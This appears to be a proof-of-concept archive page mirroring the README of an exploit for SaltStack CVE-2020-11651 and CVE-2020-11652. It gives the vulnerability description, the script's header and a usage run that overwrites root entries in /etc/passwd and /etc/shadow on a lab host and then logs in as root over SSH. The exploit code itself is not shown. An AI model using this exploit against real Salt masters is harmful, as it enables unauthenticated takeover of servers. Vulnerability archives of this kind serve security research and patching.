Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-11651 PoC — SaltStack Salt 安全漏洞

Source
https://github.com/Drew-Alleman/CVE-2020-11651
Associated Vulnerability
Title:SaltStack Salt 安全漏洞 (CVE-2020-11651)
Description:An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
Description
A script that exploits SaltStack CVE-2020-11651 and CVE-2020-11652 to add new users to a vulnerable Salt master by injecting entries into /etc/passwd and /etc/shadow.
Readme
# CVE-2020-11651
A script that exploits SaltStack CVE-2020-11651 and CVE-2020-11652 to add new users to a vulnerable Salt master by injecting entries into /etc/passwd and /etc/shadow.

```python
# Exploit Title: Saltstack 3000.1 - Remote Code Execution
# Date: 2020-05-04
# Orignal Exploit Author: Jasper Lievisse Adriaanse
# Modified Author: Drew Alleman
# Vendor Homepage: https://www.saltstack.com/
# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*
# Tested on: Debian 10 with Salt 2019.2.0
# CVE : CVE-2020-11651 and CVE-2020-11652
# Description: Saltstack authentication bypass/remote code execution
#
# Orignal Source: https://github.com/jasperla/CVE-2020-11651-poc
# Modified Source: https://github.com/Drew-Alleman/CVE-2020-11651
# This exploit is based on this checker script:
# https://github.com/rossengeorgiev/salt-security-backports
```

## Usage
```
$ python3 CVE-2020-11651-11652-add_user.py -m 192.168.158.62 --replace-root -d
[DEBUG] Auth Info Response: ['user', 'UserAuthenticationError', {'root': 'MpZiP+J3yTzjOQ+ILgZ7KN+os/Jadne3sLha7b7kNz2jLBxBC9hDlajSCObG/ZASPF1RfAr9Lrs='}, []]
[DEBUG] Connected to 192.168.158.62:4506
[DEBUG] Removing existing root line from /etc/passwd
[DEBUG] Removing existing root line from /etc/shadow
[DEBUG] Written to /etc/passwd
[DEBUG] Written to /etc/shadow
[INFO] User root:cvQ0OQaXOf8aYi0Ox*eKGPAQ created successfully.
                                                                                                                                                                                            
┌──(.venv)─(drew㉿whitehat)-[~/OSCP_LIKE/Linux/Twiggy/exploits]
└─$ sshpass -p 'cvQ0OQaXOf8aYi0Ox*eKGPAQ' ssh root@192.168.158.62
Last login: Sun Mar 30 02:23:06 2025 from 192.168.45.180
[root@twiggy ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@twiggy ~]# 
```
File Snapshot

 [4.0K]  /data/pocs/5d2ea6af4396917b00453a73cf3094957cc80bb7
├── [8.0K]  CVE-2020-11651-11652-add_user.py
└── [1.8K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →